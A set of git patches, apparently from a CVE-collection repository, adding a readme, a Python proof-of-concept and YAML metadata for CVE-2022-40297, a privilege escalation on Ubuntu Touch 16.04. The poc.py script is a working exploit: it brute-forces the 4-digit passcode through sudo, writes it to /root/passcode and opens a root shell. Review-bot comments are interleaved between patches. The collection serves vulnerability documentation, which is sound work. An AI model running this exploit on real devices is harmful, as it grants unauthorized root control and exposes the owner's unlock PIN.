From 65f6447741c21d6c19bde04c4e3dbaac2c34e750 Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 07:30:18 +0000
Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-40297?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/linux-kernel/2022/CVE-2022-40297/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/.keep
diff --git a/cve/linux-kernel/2022/CVE-2022-40297/.keep b/cve/linux-kernel/2022/CVE-2022-40297/.keep
new file mode 100644
index 00000000..e69de29b
--
Gitee
From c4f1bcd052ee64aa0869401f1b4894b7ea0345b7 Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 07:42:15 +0000
Subject: [PATCH 2/7] rename cve/linux-kernel/2022/CVE-2022-40297/.keep to cve/linux-kernel/2022/CVE-2022-40297/readme.md.
Signed-off-by: baimafeima123
---
 cve/linux-kernel/2022/CVE-2022-40297/.keep | 0
 .../2022/CVE-2022-40297/readme.md | 20 +++++++++++++++++++
 2 files changed, 20 insertions(+)
 delete mode 100644 cve/linux-kernel/2022/CVE-2022-40297/.keep
 create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/readme.md
diff --git a/cve/linux-kernel/2022/CVE-2022-40297/.keep b/cve/linux-kernel/2022/CVE-2022-40297/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/linux-kernel/2022/CVE-2022-40297/readme.md b/cve/linux-kernel/2022/CVE-2022-40297/readme.md
new file mode 100644
index 00000000..877697f8
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-40297/readme.md
@@ -0,0 +1,20 @@
+From github: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
+
+[UPDATE 09.09.2022] I got new CVE for this vulnerability: [CVE-2022-40297](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40297).
+
+## Proof of Concept: Privilege escalation in Ubuntu Touch 16.04 - by Passcode Bruteforce
+
+Ubuntu Touch allows you to "protect" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then
+becomes a password that we can use with the sudo command and gain root privileges.
+
+This means that a malicious application can do us double harm:
+1. Easily escalate privileges and take control of the device.
+2. It can pass the screen unlock passcode to a third party.
+
+## How does my Proof of Concept work?
+
+1. We run poc.py as a regular user.
+2. App is doing bruteforce attack on password. No rate limit in system!
+3. Passcode to unlock the screen = password for sudo su to obtain root.
+4. After 1-2 minutes we have passcode on the screen, which we also save to the file /root/passcode as evidence of system compromise.
+
--
Gitee
From a4bab42a541e896601372b4bf4e8eeee0d0171a6 Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 07:44:22 +0000
Subject: [PATCH 3/7] add cve/linux-kernel/2022/CVE-2022-40297/poc.py.
Signed-off-by: baimafeima123
---
 cve/linux-kernel/2022/CVE-2022-40297/poc.py | 29 +++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-40297/poc.py
diff --git a/cve/linux-kernel/2022/CVE-2022-40297/poc.py b/cve/linux-kernel/2022/CVE-2022-40297/poc.py
new file mode 100644
index 00000000..0e468c2b
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-40297/poc.py
@@ -0,0 +1,29 @@
+"""
+Visit:
+https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
+Run as REGULAR user in Ubuntu Touch 16.04 with 4-digit passcode.
+"""
+
+import os
+import sys
+
+x = 1
+while x <= 9999:
+ password = (str(x).zfill(4))
+ result = os.system("echo {} | sudo -Si".format(password.strip()))
+ if result == "0" or result == 0:
+ print("\n\n\n===> PIN is: " + password + "\n\n\n")
+ print("whoami result:")
+ os.system("echo \"whoami; echo " + password + " > /root/passcode; echo \"We saved passcode to the file /root/passcode:\"; cat /root/passcode\" | sudo su");
+ print()
+ os.system("sudo su");
+ exit(0)
+ x = x + 1
+
+"""
+What happened?
+1. We found the 4-digit passcode via burtefore.
+2. We obtained root.
+3. We saved the content of 4-digit passcode in /root/passcode
+4. We displayed the content of /root/passcode
+"""
\ No newline at end of file
--
Gitee
From 713e1abf7ced89ea02151216f061adf7fe61eb28 Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 07:48:35 +0000
Subject: [PATCH 4/7] add cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml.
Signed-off-by: baimafeima123
---
 .../2022/yaml/CVE-2022-40297.yaml | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
new file mode 100644
index 00000000..45645404
--- /dev/null
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-40297
+source: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
+info:
+ name: 漏洞软件包简介
+ severity: 漏洞危害
+ description: |
+ 漏洞描述
+ scope-of-influence:
+ 漏洞影响范围
+ reference:
+ - 漏洞相关链接
+ classification:
+ cvss-metrics: CVSS:3.1
+ cvss-score: 漏洞评分
+ cve-id: CVE-2022-40297
+ cwe-id:
+ cnvd-id:
+ kve-id:
+ tags: 漏洞标签
\ No newline at end of file
--
Gitee
From 0d9c15dfa405f68a9802f6584a9f247e4e72634c Mon Sep 17 00:00:00 2001
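Review bot: The success test `if result == "0" or result == 0:` compares the integer wait status returned by `os.system()` with the string `"0"`, so the first operand can never be true and `if result == 0:` is what is meant; `password.strip()` on the `result = ...` line is likewise a no-op on a zero-padded digit string. `import sys` is unused (the script leaves through the builtin `exit`), and the two `os.system(...)` lines carry stray trailing `;`. The module docstring states the run context but not the script's side effects, which matter to anyone examining a device afterwards: add a line such as `Side effects: writes the recovered passcode to /root/passcode and then spawns an interactive root shell with sudo su.`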
From: baimafeima123
Date: Mon, 13 Mar 2023 08:14:03 +0000
Subject: [PATCH 5/7] update cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml.
Signed-off-by: baimafeima123
---
 .../2022/yaml/CVE-2022-40297.yaml | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
index 45645404..6064528e 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
@@ -1,19 +1,19 @@
 id: CVE-2022-40297
 source: https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
 info:
- name: 漏洞软件包简介
- severity: 漏洞危害
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
 description: |
- 漏洞描述
+ 该漏洞可通过 Sudo 对 privileged shell 使用屏幕解锁密码。这个密码只有四位数,远远低于用户帐户密码的典型长度/复杂度。使得通过简单的穷举即可获得密码,从而轻松提权控制设备或者将屏幕解锁密码传递给第三方。
 scope-of-influence:
- 漏洞影响范围
+ UBports Ubuntu Touch 16.04
 reference:
- - 漏洞相关链接
+ - https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40297
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-40297
+ - https://cve.report/CVE-2022-40297.pdf
 classification:
- cvss-metrics: CVSS:3.1
- cvss-score: 漏洞评分
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
 cve-id: CVE-2022-40297
- cwe-id:
- cnvd-id:
- kve-id:
- tags: 漏洞标签
\ No newline at end of file
+ tags: Privilege escalation, cve2022
\ No newline at end of file
--
Gitee
From 26d89d3a766cc7e1ee1b06600ccd369b134292a2 Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 08:16:19 +0000
Subject: [PATCH 6/7] update cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml.
Signed-off-by: baimafeima123
---
 cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
index 6064528e..46ad8180 100644
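Review bot: The `name` field added in this hunk describes the Linux kernel (`Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。`), while the `description` and `scope-of-influence` lines of the same hunk attribute the flaw to sudo accepting the four-digit screen-unlock passcode on UBports Ubuntu Touch 16.04, which as described is a distribution/sudo-configuration issue rather than a kernel defect; unless this repository deliberately files distribution issues under `cve/linux-kernel/`, the name should describe the affected product, e.g. `name: UBports Ubuntu Touch 16.04`. The hunk also deletes the `cwe-id:`, `cnvd-id:` and `kve-id:` keys instead of leaving them empty, so the record silently loses the classification slots the template reserves; keeping `cwe-id:` (empty if unknown) leaves the gap visible to whoever fills it later.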
--- a/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-40297.yaml
@@ -16,4 +16,4 @@ info:
 cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 7.8
 cve-id: CVE-2022-40297
- tags: Privilege escalation, cve2022
\ No newline at end of file
+ tags: Privilege escalation, Mobile-hacking, cve2022
\ No newline at end of file
--
Gitee
From e8b18b03242c7b659c934690432e5bd3f7119e2d Mon Sep 17 00:00:00 2001
From: baimafeima123
Date: Mon, 13 Mar 2023 08:17:43 +0000
Subject: [PATCH 7/7] update other_list.yaml.
Signed-off-by: baimafeima123
---
 other_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index 390c34e0..b474139d 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -7,6 +7,7 @@ cve:
 - CVE-2022-1015
 - CVE-2022-2602
 - CVE-2022-2586
+ - CVE-2022-40297
 polkit:
 - CVE-2021-3560
 redis:
--
Gitee